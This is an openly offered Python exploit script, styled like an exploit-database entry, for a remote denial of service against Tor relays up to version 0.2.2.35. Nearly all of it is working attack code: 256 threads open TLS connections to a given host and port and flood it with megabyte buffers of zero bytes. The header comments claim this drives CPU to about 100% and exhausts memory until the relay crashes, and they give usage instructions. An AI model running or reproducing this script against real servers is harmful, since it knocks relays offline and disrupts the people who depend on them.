#!/usr/bin/python # Exploit Title: Tor relay remote denial of service # Date: 12-04-2012 # Software link: https://www.torproject.org/ # Version: <= 0.2.2.35 # Tested on: Linux # # This code has 2 effects : # - Imediatly incrase the CPU usage of the server to ~ 100 % # - Hudge memory usage, if the ratio bandwich / RAM is higth this code can make Tor use all the avaiable memory and crash (works great on 127.0.0.1) # # Usage: python exploit.py host port # Exemple: python exploit.py localhost 9001 import socket, ssl import time import os import threading import sys import random if len(sys.argv) != 3 or not sys.argv[2].isdigit(): sys.stderr.write(" Usage : " + sys.argv[0] + " host port\n") os._exit(-1) t0 = time.time() buff = chr(0) * 1000000 target = (sys.argv[1], int(sys.argv[2])) error = 0 class Error: def __init__(self): self.count = 0 self.lock = threading.Lock() def error(self, msg, pound): self.lock.acquire() print " [!] Error : " + msg self.count += pound if self.count > 42: print " [!] Too many errors ! (Server may be down)" print " [+] Exiting ..." os._exit(0) self.lock.release() def flood(target, err): while True: try: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(target) ssl_sock = ssl.wrap_socket(sock) ssl_sock.do_handshake() except: err.error("Can not connect", 1) while True: ssl_sock.sendall(buff) # Yes, we just send ssl-zipped 0x00 ... except: err.error("Socket reset (server timeout)", 0) threads = [] err = Error() for i in range(256): print " [+] starting a new thread" threads.append(threading.Thread(target = flood, args = [target, err])) threads[i].start() if i < 20: time.sleep(1) elif i < 128: time.sleep(3 + random.random()) else: time.sleep(7 + random.random())